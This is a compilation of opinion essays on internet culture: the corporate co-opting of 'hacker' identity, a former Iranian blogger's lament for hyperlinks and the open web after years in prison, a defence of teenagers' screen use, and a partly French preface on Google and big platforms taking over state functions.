Indeed, the revised definition of the tech startup entrepreneur as a hacker forms part of an emergent system of Silicon Valley doublethink: individual startups portray themselves as ‘underdogs’ while simultaneously being aware of the enormous power and wealth the tech industry they’re a part of wields at a collective level. And so we see a gradual stripping away of the critical connotations of hacking. Who said a hacker can’t be in a position of power? Google cloaks itself in a quirky ‘hacker’ identity, with grown adults playing ping pong on green AstroTurf in the cafeteria, presiding over the company’s overarching agenda of network control.
This doublethink bleeds through into mainstream corporate culture, with the growing institution of the corporate ‘hackathon’. We find financial giants such as Barclays hosting startup accelerators and financial technology hackathons at forums such as the FinTech Innovation Lab in Canary Wharf in London, ostensibly to discover the ‘future of finance’… or at least the future of payment apps that they can buy out. In this context, the hacker ethic is hollowed out and subsumed into the ideology of solutionism, to use a term coined by the Belarusian-born tech critic Evgeny Morozov. It describes the tech-industry vision of the world as a series of problems waiting for (profitable) solutions.
This process of gentrification becomes a war over language. If enough newcomers with media clout use the hollowed-out version of the term, its edge grows dull. You end up with a mere affectation, failing to challenge otherwise conventional aspirations. And before you know it, an earnest Stanford grad is handing me a business card that says, without irony: ‘Founder. Investor. Hacker.’
Any gentrification process inevitably presents two options. Do you abandon the form, leave it to the yuppies and head to the next wild frontier? Or do you attempt to break the cycle, deface the estate-agent signs, and picket outside the wine bar with placards reading ‘Yuppies Go Home’?
The answer to this depends on how much you care. Immigrant neighbourhoods definitely care enough to mobilise real resistance movements to gentrification, but who wants to protect the hacker ethic? For some, the spirit of hacking is stupid and pointless anyway, an individualistic self-help impulse, not an authentic political movement. What does it matter if it gets gentrified?
We need to confront an irony here. Gentrification is a pacification process that takes the wild and puts it in frames. I believe that hacking is the reverse of that, taking the ordered rules of systems and making them fluid and wild again. Where gentrification tries to erect safe fences around things, hacker impulses try to break them down, or redefine them. These are two countervailing forces within human society. The gentrification of hacking is… well, perhaps a perfect hack.
Or maybe I’ve romanticised it. Maybe hacking has never existed in some raw form to be gentrified. Perhaps it’s always been part of the capitalist commodification processes. Stuff is pulled down and then reordered. Maybe the hackers – like the disenchanted artists and hipsters – are just the vanguard charged with identifying the next profitable investment. Perhaps hacking has always been a contradictory amalgam that combines desire for the unstable and queer with the control impulse of the stable and straight. Certainly in mainstream presentations of hacking – whether the criminal version or the Silicon Valley version – there is a control fetish: the elite coder or entrepreneur sitting at a dashboard manipulating the world, doing mysterious or ‘awesome’ things out of reach of the ordinary person.
I’m going to stake a claim on the word though, and state that the true hacker spirit does not reside at Google, guided by profit targets. The hacker impulse should not just be about redesigning products, or creating ‘solutions’. A hack stripped of anti-conventional intent is not a hack at all. It’s just a piece of business innovation.
The un-gentrified spirit of hacking should be a commons accessible to all. This spirit can be seen in the marginal cracks all around us. It’s in the emergent forms of peer production and DIY culture, in maker-spaces and urban farms. We see it in the expansion of ‘open’ scenes, from open hardware to open biotech, and in the intrigue around 3D printers as a way to extend open-source designs into the realm of manufacture. In a world with increasingly large and unaccountable economic institutions, we need these everyday forms of resistance. Hacking, in my world, is a route to escaping the shackles of the profit-fetish, not a route to profit.
Go home, yuppies.
A really interesting/different text input method
[Already posted in French a bit earlier, but this article is much more complete]
Seven months ago, I sat down at the small table in the kitchen of my 1960s apartment, nestled on the top floor of a building in a vibrant central neighbourhood of Tehran, and I did something I had done thousands of times previously. I opened my laptop and posted to my new blog. This, though, was the first time in six years. And it nearly broke my heart.
A few weeks earlier, I’d been abruptly pardoned and freed from Evin prison in northern Tehran. I had been expecting to spend most of my life in those cells: In November 2008, I’d been sentenced to nearly 20 years in jail, mostly for things I’d written on my blog.
But the moment, when it came, was unexpected. I smoked a cigarette in the kitchen with one of my fellow inmates, and came back to the room I shared with a dozen other men. We were sharing a cup of tea when the voice of the floor announcer — another prisoner — filled all the rooms and corridors. In his flat voice, he announced in Persian: “Dear fellow inmates, the bird of luck has once again sat on one fellow inmate’s shoulders. Mr. Hossein Derakhshan, as of this moment, you are free.”
That evening was the first time that I went out of those doors as a free man. Everything felt new: The chill autumn breeze, the traffic noise from a nearby bridge, the smell, the colors of the city I had lived in for most of my life.
Around me, I noticed a very different Tehran from the one I’d been used to. An influx of new, shamelessly luxurious condos had replaced the charming little houses I was familiar with. New roads, new highways, hordes of invasive SUVs. Large billboards with advertisements for Swiss-made watches and Korean flat screen TVs. Women in colorful scarves and manteaus, men with dyed hair and beards, and hundreds of charming cafes with hip western music and female staff. They were the kinds of changes that creep up on people; the kind you only really notice once normal life gets taken away from you.
Two weeks later, I began writing again. Some friends agreed to let me start a blog as part of their arts magazine. I called it Ketabkhan — it means book-reader in Persian.
Six years was a long time to be in jail, but it’s an entire era online. Writing on the internet itself had not changed, but reading — or, at least, getting things read — had altered dramatically. I’d been told how essential social networks had become while I’d been gone, and so I knew one thing: If I wanted to lure people to see my writing, I had to use social media now.
So I tried to post a link to one of my stories on Facebook. Turns out Facebook didn’t care much. It ended up looking like a boring classified ad. No description. No image. Nothing. It got three likes. Three! That was it.
It became clear to me, right there, that things had changed. I was not equipped to play on this new turf — all my investment and effort had burned up. I was devastated.
Blogs were gold and bloggers were rock stars back in 2008 when I was arrested. At that point, and despite the fact the state was blocking access to my blog from inside Iran, I had an audience of around 20,000 people every day. Everybody I linked to would face a sudden and serious jump in traffic: I could empower or embarrass anyone I wanted.
People used to carefully read my posts and leave lots of relevant comments, and even many of those who strongly disagreed with me still came to read. Other blogs linked to mine to discuss what I was saying. I felt like a king.
The iPhone was a little over a year old by then, but smartphones were still mostly used to make phone calls and send short messages, handle emails, and surf the web. There were no real apps, certainly not how we think of them today. There was no Instagram, no SnapChat, no Viber, no WhatsApp.
Instead, there was the web, and on the web, there were blogs: the best place to find alternative thoughts, news and analysis. They were my life.
It had all started with 9/11. I was in Toronto, and my father had just arrived from Tehran for a visit. We were having breakfast when the second plane hit the World Trade Center. I was puzzled and confused and, looking for insights and explanations, I came across blogs. Once I read a few, I thought: This is it, I should start one, and encourage all Iranians to start blogging as well. So, using Notepad on Windows, I started experimenting. Soon I ended up writing on hoder.com, using Blogger’s publishing platform before Google bought it.
Then, on November 5, 2001, I published a step-by-step guide on how to start a blog. That sparked something that was later called a blogging revolution: Soon, hundreds of thousands of Iranians were blogging, making Iran one of the top five nations by number of blogs, and I was proud to have a role in this unprecedented democratization of writing.
Those days, I used to keep a list of all blogs in Persian and, for a while, I was the first person any new blogger in Iran would contact, so they could get on the list. That’s why they called me “the blogfather” in my mid-twenties — it was a silly nickname, but at least it hinted at how much I cared.
Every morning, from my small apartment in downtown Toronto, I opened my computer and took care of the new blogs, helping them gain exposure and audience. It was a diverse crowd — from exiled authors and journalists, female diarists, and technology experts, to local journalists, politicians, clerics, and war veterans — and I always encouraged even more. I invited more religious, and pro-Islamic Republic men and women, people who lived inside Iran, to join and start writing.
The breadth of what was available those days amazed us all. It was partly why I promoted blogging so seriously. I’d left Iran in late 2000 to experience living in the West, and was scared that I was missing all the rapidly emerging trends at home. But reading Iranian blogs in Toronto was the closest experience I could have to sitting in a shared taxi in Tehran and listening to collective conversations between the talkative driver and random passengers.
There’s a story in the Quran that I thought about a lot during my first eight months in solitary confinement. In it, a group of persecuted Christians find refuge in a cave. They, and a dog they have with them, fall into a deep sleep. They wake up under the impression that they’ve taken a nap: In fact, it’s 300 years later. One version of the story tells of how one of them goes out to buy food — and I can only imagine how hungry they must’ve been after 300 years — and discovers that his money is obsolete now, a museum item. That’s when he realizes how long they have actually been absent.
The hyperlink was my currency six years ago. Stemming from the idea of the hypertext, the hyperlink provided a diversity and decentralisation that the real world lacked. The hyperlink represented the open, interconnected spirit of the world wide web — a vision that started with its inventor, Tim Berners-Lee. The hyperlink was a way to abandon centralization — all the links, lines and hierarchies — and replace them with something more distributed, a system of nodes and networks.
Blogs gave form to that spirit of decentralization: They were windows into lives you’d rarely know much about; bridges that connected different lives to each other and thereby changed them. Blogs were cafes where people exchanged diverse ideas on any and every topic you could possibly be interested in. They were Tehran’s taxicabs writ large.
Since I got out of jail, though, I’ve realized how much the hyperlink has been devalued, almost made obsolete.
Nearly every social network now treats a link as just the same as it treats any other object — the same as a photo, or a piece of text — instead of seeing it as a way to make that text richer. You’re encouraged to post one single hyperlink and expose it to a quasi-democratic process of liking and plussing and hearting: Adding several links to a piece of text is usually not allowed. Hyperlinks are objectivized, isolated, stripped of their powers.
At the same time, these social networks tend to treat native text and pictures — things that are directly posted to them — with a lot more respect than those that reside on outside web pages. One photographer friend explained to me how the images he uploads directly to Facebook receive a large number of likes, which in turn means they appear more on other people’s news feeds. On the other hand, when he posts a link to the same picture somewhere outside Facebook — his now-dusty blog, for instance — the images are much less visible to Facebook itself, and therefore get far fewer likes. The cycle reinforces itself.
Some networks, like Twitter, treat hyperlinks a little better. Others, insecure social services, are far more paranoid. Instagram — owned by Facebook — doesn’t allow its audiences to leave whatsoever. You can put up a web address alongside your photos, but it won’t go anywhere. Lots of people start their daily online routine in these cul de sacs of social media, and their journeys end there. Many don’t even realize that they’re using the Internet’s infrastructure when they like an Instagram photograph or leave a comment on a friend’s Facebook video. It’s just an app.
But hyperlinks aren’t just the skeleton of the web: They are its eyes, a path to its soul. And a blind webpage, one without hyperlinks, can’t look or gaze at another webpage — and this has serious consequences for the dynamics of power on the web.
More or less, all theorists have thought of gaze in relation to power, and mostly in a negative sense: the gazer strips the gazed and turns her into a powerless object, devoid of intelligence or agency. But in the world of webpages, gaze functions differently: It is more empowering. When a powerful website — say Google or Facebook — gazes at, or links to, another webpage, it doesn’t just connect it — it brings it into existence; gives it life. Metaphorically, without this empowering gaze, your web page doesn’t breathe. No matter how many links you have placed in a webpage, unless somebody is looking at it, it is actually both dead and blind; and therefore incapable of transferring power to any outside web page.
On the other hand, the most powerful web pages are those that have many eyes upon them. Just like celebrities who draw a kind of power from the millions of human eyes gazing at them any given time, web pages can capture and distribute their power through hyperlinks.
But apps like Instagram are blind — or almost blind. Their gaze goes nowhere except inwards, reluctant to transfer any of their vast powers to others, leading them into quiet deaths. The consequence is that web pages outside social media are dying.
Even before I went to jail, though, the power of hyperlinks was being curbed. Its biggest enemy was a philosophy that combined two of the most dominant, and most overrated, values of our times: novelty and popularity, reflected by the real world dominance of young celebrities. That philosophy is the Stream.
The Stream now dominates the way people receive information on the web. Fewer users are directly checking dedicated webpages, instead getting fed by a never-ending flow of information that’s picked for them by complex — and secretive — algorithms.
The Stream means you don’t need to open so many websites any more. You don’t need numerous tabs. You don’t even need a web browser. You open Twitter or Facebook on your smartphone and dive deep in. The mountain has come to you. Algorithms have picked everything for you. According to what you or your friends have read or seen before, they predict what you might like to see. It feels great not to waste time in finding interesting things on so many websites.
But are we missing something here? What are we exchanging for efficiency?
In many apps, the votes we cast — the likes, the plusses, the stars, the hearts — are actually more related to cute avatars and celebrity status than to the substance of what’s posted. A most brilliant paragraph by some ordinary-looking person can be left outside the Stream, while the silly ramblings of a celebrity gain instant Internet presence.
And not only do the algorithms behind the Stream equate newness and popularity with importance, they also tend to show us more of what we’ve already liked. These services carefully scan our behaviour and delicately tailor our news feeds with posts, pictures and videos that they think we would most likely want to see.
Popularity is not wrong in and of itself, but it has its own perils. In a free-market economy, low-quality goods with the wrong prices are doomed to failure. Nobody gets upset when a quiet Brooklyn cafe with bad lattes and rude servers goes out of business. But opinions are not the same as material goods or services. They won’t disappear if they are unpopular or even bad. In fact, history has proven that most big ideas (and many bad ones) have been quite unpopular for a long time, and their marginal status has only strengthened them. Minority views are radicalized when they can’t be expressed and recognized.
Today the Stream is digital media’s dominant form of organizing information. It’s in every social network and mobile application. Since I gained my freedom, everywhere I turn I see the Stream. I guess it won’t be too long before we see news websites organize their entire content based on the same principles. The prominence of the Stream today doesn’t just make vast chunks of the Internet biased against quality — it also means a deep betrayal to the diversity that the world wide web had originally envisioned.
There’s no question to me that the diversity of themes and opinions is less online today than it was in the past. New, different, and challenging ideas get suppressed by today’s social networks because their ranking strategies prioritize the popular and habitual. (No wonder why Apple is hiring human editors for its news app.) But diversity is being reduced in other ways, and for other purposes.
Some of it is visual. Yes, it is true that all my posts on Twitter and Facebook look somewhat similar to a personal blog: They are collected in reverse-chronological order, on a specific webpage, with direct web addresses to each post. But I have very little control over how it looks; I can’t personalize it much. My page must follow a uniform look which the designers of the social network decide for me.
The centralization of information also worries me because it makes it easier for things to disappear. After my arrest, my hosting service closed my account, because I wasn’t able to pay its monthly fee. But at least I had a backup of all my posts in a database on my own web server. (Most blogging platforms used to enable you to transfer your posts and archives to your own web space, whereas now most platforms don’t let you do so.) Even if I didn’t, the Internet Archive might keep a copy. But what if my account on Facebook or Twitter is shut down for any reason? Those services themselves may not die any time soon, but it would not be too difficult to imagine a day when many American services shut down the accounts of anyone who is from Iran, as a result of the current regime of sanctions. If that happened, I might be able to download my posts from some of them, and let’s assume the backup can be easily imported into another platform. But what about the unique web address for my social network profile? Would I be able to claim it back later, after somebody else has possessed it? Domain names switch hands, too, but managing the process is easier and clearer — especially since there is a financial relationship between you and the seller which makes it less prone to sudden and untransparent decisions.
But the scariest outcome of the centralization of information in the age of social networks is something else: It is making us all much less powerful in relation to governments and corporations.
Surveillance is increasingly imposed on civilized lives, and it just gets worse as time goes by. The only way to stay outside of this vast apparatus of surveillance might be to go into a cave and sleep, even if you can’t make it 300 years.
Being watched is something we all eventually have to get used to and live with and, sadly, it has nothing to do with the country of our residence. Ironically enough, states that cooperate with Facebook and Twitter know much more about their citizens than those, like Iran, where the state has a tight grip on the Internet but does not have legal access to social media companies.
What is more frightening than being merely watched, though, is being controlled. When Facebook can know us better than our parents with only 150 likes, and better than our spouses with 300 likes, the world appears quite predictable, both for governments and for businesses. And predictability means control.
Middle-class Iranians, like most people in the world, are obsessed with new trends. Utility or quality of things usually comes second to their trendiness. In early 2000s writing blogs made you cool and trendy, then around 2008 Facebook came in and then Twitter. Since 2014 the hype is all about Instagram, and no one knows what is next. But the more I think about these changes, the more I realize that even all my concerns might have been misdirected. Perhaps I am worried about the wrong thing. Maybe it’s not the death of the hyperlink, or the centralization, exactly.
Maybe it’s that text itself is disappearing. After all, the first visitors to the web spent their time online reading web magazines. Then came blogs, then Facebook, then Twitter. Now it’s Facebook videos and Instagram and SnapChat that most people spend their time on. There’s less and less text to read on social networks, and more and more video to watch, more and more images to look at. Are we witnessing a decline of reading on the web in favor of watching and listening?
Is this trend driven by people’s changing cultural habits, or is it that people are following the new laws of social networking? I don’t know — that’s for researchers to find out — but it feels like it’s reviving old cultural wars. After all, the web started out by imitating books and for many years, it was heavily dominated by text, by hypertext. Search engines put huge value on these things, and entire companies — entire monopolies — were built off the back of them. But as the number of image scanners and digital photos and video cameras grows exponentially, this seems to be changing. Search tools are starting to add advanced image recognition algorithms; advertising money is flowing there.
But the Stream, mobile applications, and moving images: They all show a departure from a books-internet toward a television-internet. We seem to have gone from a non-linear mode of communication — nodes and networks and links — toward a linear one, with centralization and hierarchies.
The web was not envisioned as a form of television when it was invented. But, like it or not, it is rapidly resembling TV: linear, passive, programmed and inward-looking.
When I log on to Facebook, my personal television starts. All I need to do is to scroll: New profile pictures by friends, short bits of opinion on current affairs, links to new stories with short captions, advertising, and of course self-playing videos. I occasionally click on like or share button, read peoples’ comments or leave one, or open an article. But I remain inside Facebook, and it continues to broadcast what I might like. This is not the web I knew when I went to jail. This is not the future of the web. This future is television.
Sometimes I think maybe I’m becoming too strict as I age. Maybe this is all a natural evolution of a technology. But I can’t close my eyes to what’s happening: a loss of intellectual power and diversity, and of the great potential the web could have for our troubled times. In the past, the web was powerful and serious enough to land me in jail. Today it feels like little more than entertainment. So much so that even Iran doesn’t take some of it — Instagram, for instance — seriously enough to block.
I miss when people took time to be exposed to different opinions, and bothered to read more than a paragraph or 140 characters. I miss the days when I could write something on my own blog, publish on my own domain, without taking an equal time to promote it on numerous social networks; when nobody cared about likes and reshares.
That’s the web I remember before jail. That’s the web we have to save.
Even though multiple generations have now grown up glued to the flickering light of the TV, we still can’t let go of the belief that the next generation of technology is going to doom our kids. We blame technology rather than working to understand why children engage with screens in the first place.
I’ve spent over a decade observing young people’s practices with technology and interviewing families about the dynamics that unfold. When I began my research, I expected to find hordes of teenagers who were escaping “real life” through the Internet. That was certainly my experience. As a geeky, queer youth growing up in suburban America in the early 1990s, the Internet was the only place where I didn’t feel judged. I wanted to go virtual, for my body to not matter, to live in a digital-only world.
To my surprise — and, as I grew older, relief — that differed from what most youth want. Early on in my research, I met a girl in Michigan who told me that she’d much rather get together with her friends in person, but she had so many homework demands and her parents were often concerned about her physical safety. This is why she loved the Internet: She could hang out with her friends there. I've heard this reasoning echoed by youth around the country.
This is the Catch-22 that we’ve trapped today’s youth in. We’ve locked them indoors because we see the physical world as more dangerous than ever before, even though by almost every measure, we live in the safest society to date. We put unprecedented demands on our kids, maxing them out with structured activities, homework and heavy expectations. And then we’re surprised when they’re frazzled and strung out.
For many teenagers, technology is a relief valve. (And that goes for the strung-out, overworked parents and adults playing Candy Crush, too.) It’s not the inherently addictive substance that fretting parents like to imagine. It simply provides an outlet.
The presence of technology alone is not the issue. We see much higher levels of concern about technology “addiction” in countries where there’s even greater pressure to succeed and fewer social opportunities (e.g., China, South Korea, etc.).
If Americans truly want to reduce the amount of time young people spend on technology, we should free up more of their time.
For one thing, we could radically reduce the amount of homework and tests American youth take. Finland and the Netherlands consistently outperform the U.S. in school, and they emphasize student happiness, assigning almost no homework. (To be sure, they also respect their teachers and pay them what they’re worth.) When I lecture in these countries, parents don't seem nearly as anxious about technology addiction as Americans.
We should also let children roam. It seems like every few weeks I read a new story about a parent who was visited by child services for letting their school-aged children out of their sight. Indeed, studies in the U.S. and the U.K. consistently show that children have lost the right to roam.
This is why many of our youth turn to technology. They aren’t addicted to the computer; they’re addicted to interaction, and being around their friends. Children, and especially teenagers, don’t want to only socialize with parents and siblings; they want to play with their peers. That’s how they make sense of the world. And we’ve robbed them of that opportunity because we’re afraid of boogeymen.
We’re raising our children in captivity and they turn to technology to socialize, learn and decompress. Why are we blaming the screens?
« Google et de manière plus générale les grands services de l’Internet (le plus souvent californiens) sont en train de prendre, sans qu’on s’en rende compte, la place de l’État, des États, dans la gestion quotidienne de nos droits et libertés. Cette évolution quasiment invisible s’est faite avec l’assentiment tacite (parce que l’enjeu est incompris) des citoyens-internautes-clients, et avec la complicité aveugle des gouvernements qui, par manque de vision politique, ont cédé chaque jour davantage de terrain en croyant y trouver leur intérêt. Si, en moins de vingt ans, une entreprise comme Google a pu prendre une place aussi gigantesque dans le cœur même des usages et des infrastructures numériques, c’est qu’elle a su maîtriser son développement sur tous les fronts.
Internet est un espace et un réseau qui, par sa nature, a vocation à mettre en relation les uns avec les autres des ordinateurs, dans une construction non-pyramidale. L’immense nouveauté d’Internet, par opposition à la transmission « hors ligne » des informations ou au Minitel, par exemple, c’est cette organisation décentralisée, « neutre » techniquement, où il suffit de se brancher pour avoir accès à tout le réseau. C’est ainsi qu’Internet a pu tisser ce qu’on a rapidement appelé, dans le monde entier (ou presque), une « Toile ». Forcément, c’était un peu déstabilisant. Et quiconque se projette dans l’Internet pré-Google se souvient de l’importance absolument cruciale des annuaires et des premiers moteurs de recherche pour trouver, ou tenter de trouver, ce qu’on cherchait sur cette Toile en apparence anarchique.
Et puis sont arrivées les grandes plateformes, telles Google, Amazon, etc., à partir du début des années 2000. Des services web à vocation hégémonique, qui ont fondé leur développement uniquement sur la publicité, et sur une publicité exploitant nos comportements de navigation et nos données personnelles. Il me semble que c’est ainsi que le rêve de substitution googlien décrit dans ce livre a pu se développer. Il serait injuste d’ailleurs de ne parler que de Google : d’autres entreprises comme Facebook, Apple, Amazon, etc., fonctionnent de la même façon. Leurs caractéristiques et manières d’agir sont communes.
First of all, dominate a domain by providing the “best” service. Make that service easy to use; organize the massive exploitation of data and the “lock-in” so as to serve customers and bring them what they want. What they are looking for. Make sure they ask no questions and have their basic needs satisfied: getting a satisfactory answer to a search, finding or reconnecting with friends and being able to talk with them, finding a book or a song in three clicks.
Constantly improve the services by relying on centralization and the massive exploitation of personal and browsing data. Little by little, shrink the user’s scope for exploration and navigation. Steer the results, display “related” content, serve up similar content again and again. Gradually destroy what is perhaps the Internet’s greatest quality: serendipity, the possibility of making accidental discoveries.
Having achieved hegemony, the “horizontal” monopoly, develop vertical concentration. Own and build the Internet’s entire production chain. As the text you have just read explains, the fact that Google lays its own undersea cables or produces its own electricity is a major sign of the extraordinary concentration of the sector, and of the vertical hold that a company originally devoted to search engines has managed to take over the technology industry.
It then becomes easy for these talented innovators, intoxicated by their success and ideologically converted to a technophilia that sometimes verges on transhumanism (the faith in the physical and mental enhancement of human beings through technology), to dream of living without the state and, through a “liquid,” imperceptible transformation of society’s rules, to take the leap into political and social utopia.
It must be said that states are proving quite powerless, overwhelmed, even complicit in this evolution. They delegate entire swaths of their sovereign missions to these giants, seemingly without any prior reflection on the political and social upheavals this may bring. Yes, Google and its peers are in the process of dominating the world and creating a new one. But they can do so only because we and our states let them.
When the NSA (National Security Agency) no longer needs to collect the data of the world’s Internet users itself in order to carry out its mass surveillance, since it has only to fetch it directly from the Internet giants, the American government has no interest in seeing this business model built on personal data come to an end. Intelligence services around the world can then come and take what they need from the great surveillance marketplace.
Weakened sovereign powers are being taken over by companies eager to fill the void
When the Court of Justice of the European Union asks Google and the search engines to hide results, at their own discretion, in the name of the “right to be forgotten,” it ratifies the fact that collective memory and the right to information, which today pass primarily through the Internet, are managed by a private company. Outside of any judicial decision, Google decides what should or should not be visible to the eyes of the world.
When the rights holders of the culture and entertainment industries demand that web services stop giving access to content that violates copyright, here again without any judicial decision, they ratify the fact that individual cultural expression and the sharing of content can be subjected to the choices of Google’s bots. Thus, at the request of these rights holders, bots scour YouTube for content that appears to them to infringe copyright and remove it without discussion, leading to numerous abuses against which users are often powerless. The courts do not intervene upstream of these decisions, and it then falls to users to prove their “honesty” in order to get their content put back online.
When ministers of the French government prefer that web services and social networks handle abusive speech by “taking their responsibilities,” they delegate to those companies one of our most fundamental rights: freedom of expression.
When American companies like Facebook or Apple offer their female employees the option of freezing their eggs, leaving them “free” to postpone pregnancy and allowing them not to “waste their careers,” it is private life at its most intimate that is being taken over by the company.
When African countries rejoice that a Google or a Facebook is setting up Internet-access infrastructure for free, without concern for these companies’ ultimate aims, they offload their responsibilities and accept that access to the digital world will be entirely dependent on the commercial objectives of these players.
These examples show that by accepting, without further reflection, the phenomenal power of these new companies over ever larger swaths of our lives, far beyond the services the companies put forward, governments and citizens have given up, or at the very least have failed to grasp, the measure of what they are surrendering to Google, Facebook, Apple, Amazon, and the other giants.
In a period of generalized economic and political crisis, it is not surprising that sovereign powers should be weakened and taken over by companies eager to fill the void. The speed of technological change, confronting political leaders who are often overwhelmed and short on long-term political thinking, makes the problem worse. The world is not divided between technophiles and technophobes. To think that way is to play into the hands of the United States of Google. It is to believe that our only choice is between a deadly retreat into the past and a headlong rush toward the algorithmic management of our lives.
We absolutely must read those who are thinking about the future of the digital world. Like Fred Turner, cited in this text, who brilliantly shows how the technophile utopia cannot serve as an alternative to political society. That politics must change and that governments must reinvent themselves seems obvious. That most certainly does not mean we should take the easy way out by delegating the management of our fundamental rights, or of the public sphere, to companies whose main concern is, of course, their bottom line. No, Google will not give us better lives. Google changes the world for its own benefit, and that goal is natural for a company. It is up to us to decide what we want to make of this digital world that has been upending our lives for the past twenty years.
The duty of citizens and politicians is to see further. To choose and to design the society they want. Not to write the law in reaction to the Internet behemoths, nor, on the contrary, by conceding everything to them, but with the general interest in mind, and first of all that of citizens.
Our fundamental freedoms are fragile. They were fragile yesterday, too, but more compartmentalized between public space, private space, economic space, and political space. Today everything ends up on the Internet, and these spaces converge and intertwine intimately. It is all the more important to take the measure of these changes and to legislate intelligently. Economy and freedoms, politics and private life are interwoven as they probably never have been in history.
We are fortunate to live in a time of fundamental transformation in human history. It falls collectively to all the actors in our societies to make it a revolution in the service of humanity, and not a wholesale surrender of our values to a few dominant players or to rudderless states.
The Internet has given everyone the ability to make their voice heard. What will we do with it?”